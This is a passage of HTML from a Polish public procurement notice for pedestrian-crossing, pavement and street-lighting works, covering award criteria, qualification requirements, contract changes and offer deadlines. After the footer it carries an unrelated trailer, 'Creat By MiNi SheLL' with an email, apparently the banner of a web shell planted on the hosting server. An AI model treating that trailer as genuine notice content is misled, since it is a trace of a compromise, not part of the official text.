8x30x100cm na ławie bet. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233261-6 - Roboty budowlane w zakresie przejść dla pieszych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">25.	Zamawiający przewiduje możliwość udzielenia zamówienia, o którym mowa <br/>w art. 214 ust. 1 pkt 7 ustawy PZP, polegającego na powtórzeniu podobnych robót budowlanych. Całkowita wartość tego zamówienia wynosi:<br/>c.	Dla cz. III nie więcej niż 100 000,00 zł<br/>26.	Zamówienie, o którym mowa w art.214 ust.1 pkt 7 ustawy PZP zostanie udzielone wykonawcy zamówienia podstawowego pod warunkiem, że:<br/>1)	Na dzień udzielenia zamówienia, wykonawca spełnia warunki udziału w postępowaniu, wskazane dla zamówienia podstawowego;<br/>2)	Nie podlega wykluczeniu z postępowania w trybie art. 108 ust.1 oraz art. 109 ust.1 pkt 1-5 i 7-10 ustawy PZP</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi i gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1)	Nie podlegają wykluczeniu.<br/>2)	Spełniają warunki udziału w postępowaniu, w zakresie:<br/>a)	kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej – Zamawiający nie precyzuje szczegółowych wymagań;<br/>b)	sytuacji ekonomicznej lub finansowej – należy wykazać, że wykonawca:<br/>	posiada środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż:<br/>•	dla cz. I - 200 000,00 zł.;<br/>•	dla cz. II – 150 000,00 zł;<br/>•	dla cz. III – 200 000,00 zł.;<br/>	posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż:<br/>•	dla cz. I – 200 000,00 zł. na jedno i wszystkie zdarzenia; <br/>•	dla cz. II – 150 000,00 zł. na jedno i wszystkie zdarzenia; <br/>•	dla cz. III – 200 000,00 zł. na jedno i wszystkie zdarzenia; <br/>c)	zdolności technicznej lub zawodowej – należy wykazać, że wykonawca:<br/>	w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - <br/>w tym okresie) wykonał w sposób należyty oraz zgodnie <br/>z przepisami prawa budowlanego oraz zasadami wiedzy technicznej i prawidłowo ukończył co najmniej jedną robotę budowlaną polegającą na budowie/ przebudowie/ remoncie/ modernizacji:<br/>•	dla cz. I - <br/>o	oświetlenia ulicznego lub sygnalizacji świetlnej o wartości co najmniej 150 000,00 zł brutto.<br/>o	chodnika/ ścieżki rowerowej/ placu/ parkingu <br/>z kostki brukowej betonowej o wartości co najmniej 20 000,00 zł brutto.<br/>•	dla cz. II - <br/>o	oświetlenia ulicznego o wartości co najmniej 100 000,00 zł brutto.<br/>o	chodnika/ ścieżki rowerowej/ placu/ parkingu <br/>z kostki brukowej betonowej o wartości co najmniej 20 000,00 zł brutto.<br/>o	drogi publicznej klasy D lub wyższej <br/>o powierzchni co najmniej analogicznej <br/>w stosunku do przedmiotu zamówienia, tj. 288 m2 i o wartości co najmniej 10 000,00 zł brutto;<br/>•	dla cz. III - <br/>o	oświetlenia ulicznego lub sygnalizacji świetlnej o wartości co najmniej 100 000,00 zł brutto.<br/>o	chodnika/ ścieżki rowerowej/ placu/ parkingu <br/>z kostki brukowej betonowej o wartości co najmniej 20 000,00 zł brutto.<br/>o	drogi publicznej klasy D lub wyższej o długości co najmniej analogicznej w stosunku do przedmiotu zamówienia, tj. 49 mb i o wartości co najmniej 40 000,00 zł brutto;<br/>	przy realizacji zamówienia będzie dysponował osobami zdolnymi do wykonania zamówienia, tj. dla cz. I,II,III:<br/>•	kierownik robót – osoba posiadająca wymagane przez prawo uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych <br/>i elektroenergetycznych bez ograniczeń. Zamawiający dopuszcza kwalifikacje równoważne do w/w, zdobyte w innych państwach na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U. <br/>z 2021r., poz. 11 z późn. zm.);<br/>•	kierownik robót – osoba posiadająca wymagane przez prawo uprawnienia budowlane w specjalności drogowej bez ograniczeń. Zamawiający dopuszcza kwalifikacje równoważne do w/w, zdobyte w innych państwach na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U. z 2021r., poz. 11 z późn. zm.); <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków <br/>i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału <br/>w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>2)	zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, <br/>a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>3)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>4)	informacji z Krajowego Rejestru Karnego w zakresie dotyczącym podstaw wykluczenia wskazanych w art. 108 ust. 1 pkt 1-2 i 4, w zakresie dotyczącym orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego oraz art. 109 ust. 1 pkt 2 lit.a, lit.b w zakresie dotyczącym ukarania za wykroczenie, za które wymierzono karę aresztu, pkt 3,w zakresie dotyczącym skazania za przestępstwo lub ukarania za wykroczenie, za które wymierzono karę aresztu, 5-10 ustawy PZP sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem.<br/>5)	oświadczenia wykonawcy o aktualności informacji zawartych <br/>w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy PZP, w zakresie podstaw wykluczenia z postępowania zawartych w art. 108 ust. 1 pkt 3, pkt 4 w zakresie dotyczącym orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, pkt 5 <br/>w zakresie dotyczącym zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji, pkt 6 oraz art. 109 ust. 1 pkt. 1 w zakresie naruszenia obowiązków dotyczących płatności podatków <br/>i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991r. <br/>o podatkach i opłatach lokalnych, pkt 2 lit. a, lit. b w zakresie dotyczącym ukarania za wykroczenie, za które wymierzono karę ograniczenia wolności lub karę grzywny, pkt 3, 5, i 7-10 ustawy PZP stanowiącym zał. nr 6 do SWZ.<br/>6)	oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej stanowiące zał. nr 7 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">3.	W celu potwierdzenia spełniania przez wykonawcę warunków udziału <br/>w postępowaniu, zamawiający od Wykonawcy, którego oferta została oceniona najwyżej żąda dostarczenia w wyznaczonym terminie zgodnie z art. 274 ust.1 ustawy PZP:<br/>1)	w zakresie posiadania kompetencji lub uprawnień do prowadzenia określonej działalności:<br/>a)	oświadczenia o posiadaniu niezbędnych kompetencji lub uprawnień do realizacji zamówienia – ocena spełniania warunku w oparciu o oświadczenie o spełnianiu warunków udziału w postępowaniu (zał. nr 6);<br/>2)	w zakresie sytuacji ekonomicznej lub finansowej:<br/>a)	dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia, która jest nie niższa od <br/>a.	cz. I - 200 000,00 zł. na jedno i wszystkie zdarzenia; <br/>b.	cz. II – 150 000,00 zł. na jedno i wszystkie zdarzenia; <br/>c.	cz. III – 200 000,00 zł. na jedno i wszystkie zdarzenia; <br/>b)	informacji banku lub spółdzielczej kasy oszczędnościowo – kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem na kwotę nie niższą od:<br/>a.	cz. I – 200 000,00 zł.;<br/>b.	cz. II – 150 000,00 zł;<br/>c.	cz. III – 200 000,00 zł.;<br/>3)	w zakresie zdolności technicznej lub zawodowej <br/>a)	wykazu robót budowlanych wykonanych nie wcześniej niż <br/>w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zgodnie ze wzorem stanowiącym załącznik nr 4, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty;<br/>b)	wykaz osób, którymi wykonawca będzie dysponował przy realizacji zamówienia, zgodnie ze wzorem stanowiącym wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją <br/>o podstawie do dysponowania tymi osobami załącznik nr 5</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 2.	Zamawiający dopuszcza również możliwość wprowadzenia zmian umowy <br/>w przypadkach, o których mowa w art. 454 ust. 1 pkt 1 ustawy PZP gdy dotyczą one:<br/>1)	zmiany jakości lub innych parametrów charakterystycznych dla objętego proponowaną zmianą elementu robót budowlanych;<br/>2)	aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny;<br/>3)	zmiany producenta materiałów;<br/>4)	zmiany wymiarów, położenia lub wysokości części robót budowlanych;<br/>5)	zmiany danych identyfikacyjnych strony umowy;<br/>6)	likwidacji oczywistych omyłek pisarskich i rachunkowych w treści umowy;<br/>7)	terminu realizacji przedmiotu umowy;<br/>8)	wysokości ostatecznego wynagrodzenia;<br/>3.	Zmiany, o których mowa w ust. 2 mogą zostać dokonane, jeżeli ich uzasadnieniem jest przynajmniej jedna z niżej wymienione okoliczności:<br/>1)	działanie siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne, epidemia) mającej bezpośredni wpływ na terminowość wykonywania robót, <br/>w szczególności na podstawie art. 15r ustawy z dnia 2 marca 2020 r. <br/>o szczególnych rozwiązaniach związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych (t.j. Dz. U. poz. 1842 z późn. zm.);<br/>2)	wystąpienie niekorzystnych warunków atmosferycznych (np. opady deszczu, śniegu, ujemne temperatury), nietypowych dla danej pory roku i miesiąca uniemożliwiających realizację zamówienia w terminie określonym w niniejszej umowie;<br/>3)	zwiększenie lub zmiana zakresu robót potwierdzonego protokołem konieczności na roboty dodatkowe lub zamienne; <br/>4)	zaistnienie okoliczności będących następstwem działania organów sądowo-administracyjnych;<br/>5)	wystąpienie kolizji z planowanymi lub równolegle prowadzonymi przez Zamawiającego lub inne podmioty publiczne inwestycjami, które uniemożliwiają planową realizację robót; <br/>6)	konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji technicznej, jeżeli konieczność ta wynika z okoliczności, których Zamawiający i Wykonawca nie mogli przewidzieć w momencie zawarcia umowy;<br/>7)	konieczność przesunięcia terminu przekazania terenu budowy z powodów niezależnych od Zamawiającego;<br/>8)	zmiana przepisów prawnych obowiązujących w dniu zawarcia umowy, mająca wpływ na realizację zamówienia;<br/>9)	wystąpienie niezależnych od Wykonawcy przyczyn technologicznych wpływających na realizację przedmiotu zamówienia i przyjęte rozwiązania technologiczne;<br/>10)	rezygnacja z podwykonawstwa dla części zamówienia, którą Wykonawca wskazał w ofercie, że powierzy ją do wykonania podwykonawcy;<br/>11)	rezygnacja przez Zamawiającego z realizacji części Przedmiotu umowy, o ile jest to konieczne z punktu widzenia realizowanego zamówienia, jego społeczno-gospodarczego przeznaczenia czy interesu społecznego na skutek okoliczności niemożliwych do przewidzenia w trakcie zawierania umowy;<br/>12)	zmiany spowodowane, nieprzewidzianymi w SIWZ, warunkami geologicznymi, archeologicznymi lub terenowymi, które wymagały wstrzymania budowy, <br/>w szczególności: niewypały, niewybuchy, wykopaliska archeologiczne, odmienne od przyjętych w dokumentacji projektowej warunki geologiczne bądź warunki terenowe, w szczególności istnienie nie zinwentaryzowanych lub błędnie zinwentaryzowanych obiektów, w tym sieci lub instalacji;<br/>13)	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji projektowej lub STWiORB, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem Przedmiotu umowy;<br/>14)	zmiana osoby pełniącej funkcje kierownika robót wskazanego w ofercie gdy osoba zastępująca dotychczasową osobę będzie posiadać doświadczenie potwierdzające spełnienie warunków udziału w postępowaniu przez Wykonawcę; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-19 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">www.platformazakupowa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-19 08:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-08-04 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com